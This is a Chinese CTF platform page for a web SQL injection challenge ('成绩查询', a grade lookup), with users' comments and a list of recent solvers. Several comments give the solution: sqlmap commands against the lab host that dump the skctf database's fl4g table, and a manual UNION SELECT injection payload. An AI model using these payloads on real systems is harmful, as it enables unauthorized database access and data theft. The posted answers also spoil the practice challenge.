成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 12518
提  示:
描  述:
来源山科大ctf
评论
诗意黎明 1月前

哈吉米南北绿豆,哈哑鼓曼波

回复 1

ljy1997 2月前

说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。

回复 4

Galaxies2580 2月前

为什么打不开靶机网址,显示无法访问

回复 0

叶澜 4月前

sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump

回复 0

lovehhh 6月前

1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--

回复 8

000000k 7月前

sqlmap 秒了

回复 0

道法自然 7月前

直接用sqlmap一把梭

回复 0

chm 8月前

爆库、爆表、爆字段、拿 flag

回复 0

chm 8月前

flag{**********}

回复 0

wywitkey 8月前

sqlmap一把梭,payload:sqlmap -u http://171.80.2.169:13533/index.php --form --batch -D skctf -T fl4g --columns --dump;就是等的时间长点....

回复 0
78 7月前

@wywitkey 说跟没说没区别

回复 1

wywitkey 8月前

@2647941092 各有各的好吧,因为是时间盲注才慢的,用sqlmap我在命令跑起来后去干别的,切回来时flag就出来了,当然了我也感觉手搓更爽

回复 0

2647941092 8月前

还不如手戳

回复 0

WriteUp

image
harry

2 金币

评分(25)

解题动态

zrlht 攻破了该题 11小时前
cykai999 攻破了该题 16小时前
小韩极客 攻破了该题 23小时前
socratesx 攻破了该题 1天前
abc114514 攻破了该题 1天前
托尼二又二 攻破了该题 1天前
Anos 攻破了该题 1天前
EchoOfCloud 攻破了该题 1天前
majixikuwa 攻破了该题 1天前
五彩星云 攻破了该题 1天前
多米今天犯错了没 攻破了该题 1天前
sysgetshell 攻破了该题 2天前
倚楼叹世间 攻破了该题 2天前
hh_lll 攻破了该题 2天前
ciphercici 攻破了该题 2天前
18744838346 攻破了该题 2天前
霸气薛少 攻破了该题 4天前
苦味的辣条 攻破了该题 4天前
FreedomBK 攻破了该题 4天前
snow 攻破了该题 4天前
问题反馈